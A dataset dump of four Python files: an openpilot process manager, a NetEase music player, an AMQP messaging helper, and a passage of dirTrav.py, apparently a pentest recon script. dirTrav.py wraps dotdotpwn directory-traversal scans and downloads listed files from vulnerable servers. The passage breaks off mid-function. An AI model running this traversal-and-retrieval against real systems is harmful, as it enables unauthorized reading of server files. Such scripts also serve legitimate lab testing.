source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1040
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
# "uploader": "selfdrive.loggerd.uploader",
# "deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
# "ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
# "loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
# "updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes \
# result in a weird snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
EnableLogger = int(params.get('OpkrEnableLogger'))
if not EnableLogger:
car_started_processes.remove( 'loggerd' )
persistent_processes.remove( 'logmessaged' )
persistent_processes.remove( 'uploader' )
persistent_processes.remove( 'logcatd' )
persistent_processes.remove( 'updated' )
persistent_processes.remove( 'deleter' )
persistent_processes.remove( 'tombstoned' )
else:
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoShutdown", "3"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightness", "0"),
("OpkrEnableDriverMonitoring", "1"),
("OpkrEnableLogger", "0"),
("OpkrEnableGetoffAlert", "1"),
("OpkrAutoResume", "1"),
("OpkrVariableCruise", "0"),
("OpkrLaneChangeSpeed", "60"),
("OpkrAutoLaneChangeDelay", "0"),
("OpkrSteerAngleCorrection", "0"),
("PutPrebuiltOn", "0"),
("FingerprintIssuedFix", "0"),
("LdwsCarFix", "0"),
("LateralControlMethod", "0"),
("CruiseStatemodeSelInit", "1"),
("InnerLoopGain", "30"),
("OuterLoopGain", "20"),
("TimeConstant", "10"),
("ActuatorEffectiveness", "15"),
("Scale", "1750"),
("LqrKi", "10"),
("DcGain", "30"),
("IgnoreZone", "0"),
("PidKp", "20"),
("PidKi", "40"),
("PidKf", "5"),
("CameraOffsetAdj", "60"),
("SteerRatioAdj", "135"),
("SteerActuatorDelayAdj", "35"),
("SteerRateCostAdj", "50"),
("SteerLimitTimerAdj", "80"),
("TireStiffnessFactorAdj", "75"),
("SteerMaxAdj", "380"),
("SteerDeltaUpAdj", "3"),
("SteerDeltaDownAdj", "7"),
("SteerMaxvAdj", "10"),
("OpkrBatteryChargingControl", "1"),
("OpkrBatteryChargingMin", "70"),
("OpkrBatteryChargingMax", "80"),
("OpkrUiOpen", "0"),
("OpkrDriveOpen", "0"),
("OpkrTuneOpen", "0"),
("OpkrControlOpen", "0"),
("LeftCurvOffsetAdj", "0"),
("RightCurvOffsetAdj", "0"),
("DebugUi1", "0"),
("DebugUi2", "0"),
("OpkrBlindSpotDetect", "0"),
("OpkrMaxAngleLimit", "90"),
("OpkrAutoResumeOption", "0"),
("OpkrAngleOffsetSelect", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
player.py
|
#!/usr/bin/env python
#encoding: UTF-8
'''
网易云音乐 Player
'''
# Let's make some noise
import subprocess
import threading
import time
import os
import signal
from .ui import Ui
# carousel x in [left, right]
carousel = lambda left, right, x: left if (x>right) else (right if x<left else x)
class Player:
def __init__(self):
self.PLAY_MODE_NORMAL = 1
self.PLAY_MODE_SHUFFLE = 2
self.PLAY_MODE_REPEAT = 3
self.ui = Ui()
self.datatype = 'songs'
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.pause_flag = False
self.play_mode = self.PLAY_MODE_NORMAL
self.songs = []
self.idx = 0
self.q_level = 0
def popen_recall(self, onExit, popenArgs):
"""
Runs the given args in a subprocess.Popen, and then calls the function
onExit when the subprocess completes.
onExit is a callable object, and popenArgs is a lists/tuple of args that
would give to subprocess.Popen.
"""
def runInThread(onExit, popenArgs):
self.popen_handler = subprocess.Popen(['mpg123', popenArgs], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# auto decrease quality level , [hMusic, bMusic, mMusic, defaultMusic, lMusic]
if self.q_level != 4:
count = 20
for line in self.popen_handler.stderr:
if count == 0:
self.q_level += 2
self.next()
return
count -= 1
self.popen_handler.wait()
if self.playing_flag:
self.idx = carousel(0, len(self.songs)-1, self.idx+1 )
onExit()
return
thread = threading.Thread(target=runInThread, args=(onExit, popenArgs))
thread.start()
# returns immediately after the thread starts
return thread
def notify(self, item, executable='notify-send'):
try:
try:
msg = 'display notification "' + item['artist'] + ' < ' + item['album_name'] + ' >' + '" with title "' + item['song_name'] +'"'
subprocess.Popen(['osascript', '-e', msg])
except:
pass
except:
cover_path = os.path.expanduser('~') + \
'/netease-musicbox/cover.jpg'
song_info = "%s-%s \n %s" \
% (item['album_name'], item['song_name'], item['artist'])
with open(os.devnull, 'w') as fnull:
handler = subprocess.Popen(['curl', item['cover_url'], '-o', cover_path],
stdout=fnull, stderr=subprocess.STDOUT)
handler.wait()
handler = subprocess.Popen(['convert', cover_path, '-resize', '150x150', cover_path],
stdout=fnull, stderr=subprocess.STDOUT)
handler.wait()
handler = subprocess.Popen(['notify-send', '-i', cover_path, '-t', '3000', song_info],
stdout=fnull, stderr=subprocess.STDOUT)
def recall(self):
self.playing_flag = True
item = self.songs[ self.idx ]
self.ui.build_playinfo(item['song_name'], item['artist'], item['album_name'], item['mp3'][self.q_level]['bitrate'])
self.popen_recall(self.recall, item['mp3'][self.q_level]['mp3_url'])
self.notify(item)
def play(self, datatype, songs, idx):
# if same playlists && idx --> same song :: pause/resume it
self.datatype = datatype
if len(songs) and (datatype == 'songs' or datatype == 'djchannels'):
if idx == self.idx and songs == self.songs:
if self.pause_flag:
self.resume()
else:
self.pause()
else:
if datatype == 'songs' or datatype == 'djchannels':
self.songs = songs
self.idx = idx
# if it's playing
if self.playing_flag:
self.switch()
# start new play
else:
self.recall()
# if current menu is not song, pause/resume
else:
if self.playing_flag:
if self.pause_flag:
self.resume()
else:
self.pause()
else:
pass
# play another
def switch(self):
self.stop()
# wait process be killed
time.sleep(0.01)
self.recall()
def stop(self):
if self.playing_flag and self.popen_handler:
self.playing_flag = False
self.popen_handler.kill()
def pause(self):
self.pause_flag = True
os.kill(self.popen_handler.pid, signal.SIGSTOP)
item = self.songs[ self.idx ]
self.ui.build_playinfo(item['song_name'], item['artist'], item['album_name'], bitrate=item['mp3'][self.q_level]['bitrate'], pause=True)
def resume(self):
self.pause_flag = False
os.kill(self.popen_handler.pid, signal.SIGCONT)
item = self.songs[ self.idx ]
self.ui.build_playinfo(item['song_name'], item['artist'], item['album_name'], bitrate=item['mp3'][self.q_level]['bitrate'])
def next(self):
self.stop()
time.sleep(0.01)
if self.play_mode == self.PLAY_MODE_NORMAL:
self.idx = carousel(0, len(self.songs)-1, self.idx+1 )
elif self.play_mode == PLAY_MODE_SHUFFLE:
self.idx = random.sample(range(0, len(self.songs)), 1)[0]
self.recall()
def prev(self):
self.stop()
time.sleep(0.01)
self.idx = carousel(0, len(self.songs)-1, self.idx-1 )
self.recall()
|
amqp_exchange.py
|
try:
import kombu
from kombu import pools
except ImportError:
kombu = None
import socket
import logging
import threading
from time import sleep
log = logging.getLogger(__name__)
KOMBU_UNAVAILABLE = "Attempting to bind to AMQP message queue, but kombu dependency unavailable"
DEFAULT_EXCHANGE_NAME = "lwr"
DEFAULT_EXCHANGE_TYPE = "direct"
# Set timeout to periodically give up looking and check if polling should end.
DEFAULT_TIMEOUT = 0.2
DEFAULT_HEARTBEAT = 580
DEFAULT_RECONNECT_CONSUMER_WAIT = 1
DEFAULT_HEARTBEAT_WAIT = 1
class LwrExchange(object):
""" Utility for publishing and consuming structured LWR queues using kombu.
This is shared between the server and client - an exchange should be setup
for each manager (or in the case of the client, each manager one wished to
communicate with.)
Each LWR manager is defined solely by name in the scheme, so only one LWR
should target each AMQP endpoint or care should be taken that unique
manager names are used across LWR servers targetting same AMQP endpoint -
and in particular only one such LWR should define an default manager with
name _default_.
"""
def __init__(
self,
url,
manager_name,
connect_ssl=None,
timeout=DEFAULT_TIMEOUT,
publish_kwds={},
):
"""
"""
if not kombu:
raise Exception(KOMBU_UNAVAILABLE)
self.__url = url
self.__manager_name = manager_name
self.__connect_ssl = connect_ssl
self.__exchange = kombu.Exchange(DEFAULT_EXCHANGE_NAME, DEFAULT_EXCHANGE_TYPE)
self.__timeout = timeout
# Be sure to log message publishing failures.
if publish_kwds.get("retry", False):
if "retry_policy" not in publish_kwds:
publish_kwds["retry_policy"] = {}
if "errback" not in publish_kwds["retry_policy"]:
publish_kwds["retry_policy"]["errback"] = self.__publish_errback
self.__publish_kwds = publish_kwds
@property
def url(self):
return self.__url
def consume(self, queue_name, callback, check=True, connection_kwargs={}):
queue = self.__queue(queue_name)
log.debug("Consuming queue '%s'", queue)
while check:
heartbeat_thread = None
try:
with self.connection(self.__url, heartbeat=DEFAULT_HEARTBEAT, **connection_kwargs) as connection:
with kombu.Consumer(connection, queues=[queue], callbacks=[callback], accept=['json']):
heartbeat_thread = self.__start_heartbeat(queue_name, connection)
while check and connection.connected:
try:
connection.drain_events(timeout=self.__timeout)
except socket.timeout:
pass
except (IOError, socket.error) as exc:
# In testing, errno is None
log.warning('Got %s, will retry: %s', exc.__class__.__name__, exc)
if heartbeat_thread:
heartbeat_thread.join()
sleep(DEFAULT_RECONNECT_CONSUMER_WAIT)
def heartbeat(self, connection):
log.debug('AMQP heartbeat thread alive')
while connection.connected:
connection.heartbeat_check()
sleep(DEFAULT_HEARTBEAT_WAIT)
log.debug('AMQP heartbeat thread exiting')
def publish(self, name, payload):
with self.connection(self.__url) as connection:
with pools.producers[connection].acquire() as producer:
key = self.__queue_name(name)
producer.publish(
payload,
serializer='json',
exchange=self.__exchange,
declare=[self.__exchange],
routing_key=key,
**self.__publish_kwds
)
def __publish_errback(self, exc, interval):
log.error("Connection error while publishing: %r", exc, exc_info=1)
log.info("Retrying in %s seconds", interval)
def connection(self, connection_string, **kwargs):
if "ssl" not in kwargs:
kwargs["ssl"] = self.__connect_ssl
return kombu.Connection(connection_string, **kwargs)
def __queue(self, name):
queue_name = self.__queue_name(name)
queue = kombu.Queue(queue_name, self.__exchange, routing_key=queue_name)
return queue
def __queue_name(self, name):
key_prefix = self.__key_prefix()
queue_name = '%s_%s' % (key_prefix, name)
return queue_name
def __key_prefix(self):
if self.__manager_name == "_default_":
key_prefix = "lwr_"
else:
key_prefix = "lwr_%s_" % self.__manager_name
return key_prefix
def __start_heartbeat(self, queue_name, connection):
thread_name = "consume-heartbeat-%s" % (self.__queue_name(queue_name))
thread = threading.Thread(name=thread_name, target=self.heartbeat, args=(connection,))
thread.start()
return thread
|
dirTrav.py
|
#!/usr/bin/python
#ONLY WEB HAS BEEN IMPLEMENTED
#If /usr/share/dotdotpwn/Reports exists, dotdotpwn will automatically put raw results in there for you
#Reconscan.py creates the Reports directory for you
import sys
import os
import subprocess
from subprocess import CalledProcessError
import argparse
import multiprocessing
from multiprocessing import Process, Queue
import requests
import time
from shutil import move
#This function currently runs regular and an extension web scans using ddpwn on a list of URLs
#If something is found, it will output the result to the /dirb/ directory
def dotPwn(URL):
#Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
# Available options:
# -m Module [http | http-url | ftp | tftp | payload | stdout]
# -h Hostname
# -O Operating System detection for intelligent fuzzing (nmap)
# -o Operating System type if known ("windows", "unix" or "generic")
# -s Service version detection (banner grabber)
# -d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
# -f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
# -E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
# -S Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
# -u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
# -k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
# -p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
# -x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
# -t Time in milliseconds between each test (default: 300 (.3 second))
# -X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
# -e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
# -U Username (default: 'anonymous')
# -P Password (default: '[email protected]')
# -M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
# -r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
# -b Break after the first vulnerability is found
# -q Quiet mode (doesn't print each attempt)
# -C Continue if no data was received from host
port, resultsOut, baseURL, URL = parseURL(URL)
konfirmString = setDotPwnOptions()
if ("TRAVERSAL" in URL):
DOTPWN = 'dotdotpwn.pl -m http-url -u %s -k %s -d %s -o %s -x %s -t 1 -q -C -b' % (URL, konfirmString, args.depth, args.os, port)
DOTPWNE = 'dotdotpwn.pl -m http-url -u %s -k %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (URL, konfirmString, args.depth, args.os, port, args.extensions)
else:
DOTPWN = 'dotdotpwn.pl -m http -h %s -k %s -d %s -o %s -x %s -t 1 -q -C -b' % (baseURL, konfirmString, args.depth, args.os, port)
DOTPWNE = 'dotdotpwn.pl -m http -h %s -k %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (baseURL, konfirmString, args.depth, args.os, port, args.extensions)
try:
DOTPWNRESULTS = subprocess.check_output(DOTPWN, shell=True)
except CalledProcessError as ex:
writeOutputFile = True
text = ex.output.split("\n")
for line in text:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s" % resultsOut
print "INFO: Traversals found! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(ex.output)
outFileWriter.close()
except:
raise
if (len(vuln) == 0): #don't run extension scan if we already have a vuln
try:
DOTPWNERESULTS = subprocess.check_output(DOTPWNE, shell=True)
except CalledProcessError as fx:
writeOutputFile = True
textE = fx.output.split("\n")
for line in textE:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s using file extensions" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/E%s" % resultsOut
print "INFO: Traversals found using extensions! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(fx.output)
outFileWriter.close()
except:
raise
if (args.scan_and_retrieve and len(vuln) > 0):
print "INFO: Downloading files"
retrieve()
#grab pieces to build URL, feed in files to grab,
def retrieve():
vulnURLs = analyzeVuln(vuln)
tmp = vulnURLs[0]
vulnProto = tmp[0]
vulnBase = tmp[1]
vulnPage = tmp[2]
vulnStringPrefix = tmp[3]
vulnStringSuffix = tmp[4]
encodedSplit = tmp[5]
try:
xfilFileName = "%s" % args.xfil_files
xfilFile = open(xfilFileName,'r')
for xfil in xfilFile:
if (xfil[0] == "/"):
xfil = xfil[1:]
if ("\n" in xfil):
xfil = xfil[:-1]
xfiltmp = xfil.replace("/", "_") #for outputFile
vulnBasetmp = vulnBase.replace("/", "_") #for outputFile
xfil = xfil.replace("/", encodedSplit)
#2x vulnStringPrefix due to a parsing bug. Additional shouldn't hurt....
fullURL = vulnProto + vulnBase + vulnPage + vulnStringPrefix + vulnStringPrefix + xfil + vulnStringSuffix
#print "DEBUG: %s" % fullURL
fileContents, status_code = grabFileFromURL(fullURL)
if (status_code == 200):
outputFile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s_%s" % (vulnBasetmp, xfiltmp)
try:
output = open(outputFile, 'w+')
output.write(fileContents)
output.close()
except UnicodeEncodeError:
#print "WARNING: Unicode errors. Forcing ascii, xmlcharrefreplace"
output = open(outputFile, 'w+')
fileContents = fileContents.encode('ascii','xmlcharrefreplace')
output.write(fileContents)
output.close()
except:
raise
except:
raise
sortRetrievedFiles()
time.sleep(1)
sortMostInterestingFiles()
time.sleep(1)
sortEverythingElse()
print "INFO: Downloading of files complete"
def grabFileFromURL(url):
try:
